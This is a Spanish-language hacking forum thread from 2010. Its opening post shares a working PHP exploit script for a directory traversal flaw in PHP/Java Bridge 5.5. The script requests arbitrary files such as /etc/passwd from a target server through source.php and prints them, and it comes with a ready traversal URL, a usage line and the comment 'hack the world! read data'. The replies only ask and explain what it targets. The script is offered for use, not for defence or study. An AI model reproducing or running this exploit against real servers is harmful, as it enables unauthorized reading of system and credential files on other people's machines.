Página 1 de 1

Java Bridge v. 5.5 Directory Traversal Vulnerability

Publicado: 08 Sep 2010, 20:42
por Skillmax
Cualquier duda preguntan.

Código: Seleccionar todo

/*Title: PHP/Java Bridge 5.5
Date : Sep 6, 2010
Author: Saxtor {Location: South America (Guyana)}
Email: [email protected]
Category::  Web Applications 
Verison: 5.5
 
 
suffers a directory traversal
vulnerability.  This vulnerability could allow
attackers to read arbitrary files =>
------------------------------
http://localhost/Javabridge/source.php?source=/etc/passwd
------------------------------
 */
<?php
 
 /**
 * @param Author   Saxtor Location{South America Guyana}
 * @param Email:   [email protected]
 * @param  Guys please dont beleive in 2012 if you are you are playing a part of getting this world to end :( its all our perception and thinking will cause invent to happen however you will be dead and alive at the same time hehe but for now hack the world! read data
 */
 
 
class Javabridgexploit
{
    /**
     * @param Start
     */
                public function __construct($argv)
                {
                                $this->Exploit($argv);
                }
 
                public function arguments($argv)
                {
                                $_ARG = array();
                                foreach ($argv as $arg)
                                {
                                                if (ereg('--[a-zA-Z0-9]*=.*', $arg))
                                                {
                                                                $str = split("=", $arg);
                                                                $arg = '';
                                                                $key = ereg_replace("--", '', $str[0]);
                                                                for ($i = 1; $i < count($str); $i++)
                                                                {
                                                                                $arg .= $str[$i];
                                                                }
                                                                $_ARG[$key] = $arg;
                                                } elseif (ereg('-[a-zA-Z0-9]', $arg))
                                                {
                                                                $arg = ereg_replace("-", '', $arg);
                                                                $_ARG[$arg] = 'true';
                                                }
 
                                }
                                return $_ARG;
                }
 
                public function ConnectToVictim($url, $path,
                                $dir)
                {
                                $link = "$url/$path/source.php?source=$dir";
 
                                $y = preg_match_all("/http:\/\//", $link,
                                                $array);
                                if ($y == 1)
                                {
                                                $ch = curl_init();
                                                curl_setopt($ch, CURLOPT_URL, $link);
                                                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                curl_setopt($ch, CURLOPT_USERAGENT,
                                                                "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
                                                curl_setopt($ch, CURLOPT_REFERER,
                                                                "http://www.x.org");
                                                $output = curl_exec($ch);
 
 
                                                $x = preg_match_all("%:root:%", $output, $array);
                                                $guyanarocks = $array[0][0];
                                                if ($guyanarocks == null)
                                                {
                                                                echo "No Data Found :(";
                                                }
                                                else
                                                {
                                                                echo $output;
                                                }
 
 
                                }
                                else {
                                    die("Invalid Url Must Include http:// example http://php-java-bridge.sourceforge.net");
                                }
 
                }
 
                public function Exploit($argv)
                {
                                $info = $this->arguments($argv);
 
                                $url  = $info['url'];
                                $path = $info['path'];
                                $dir  = $info['dir'];
 
                                if ($url == null && $path == null)
                                {
                                                echo "example exploit.php --url=http://php-java-bridge.sourceforge.net --path=examples --dir=/etc/passwd";
                                }
 
                                $this->ConnectToVictim($url, $path, $dir);
 
 
 
                }
 
}
 
$guyanarules = new Javabridgexploit($argv);
 
  
 
 
?>


Re: Java Bridge v. 5.5 Directory Traversal Vulnerability

Publicado: 09 Sep 2010, 01:19
por rere2
No veo por ningun lado que vulnerabilidad aprovecha este exploit :S
Y tampoco que webs son vulnerables al mismo...
Un saludo y gracias por el aporte Skill

Re: Java Bridge v. 5.5 Directory Traversal Vulnerability

Publicado: 09 Sep 2010, 07:47
por Skillmax
rere2 escribió:No veo por ningun lado que vulnerabilidad aprovecha este exploit :S
Y tampoco que webs son vulnerables al mismo...
Un saludo y gracias por el aporte Skill

Ataca a las vulnerabilidades que pone el codigo Java Bridge v5.5

[Enlace externo eliminado para invitados]? ... etc/passwd

Y abajo está el codigo del exploit, Si no entiendes todavia me avisas, lo que pasa que no hay un dork, nada más.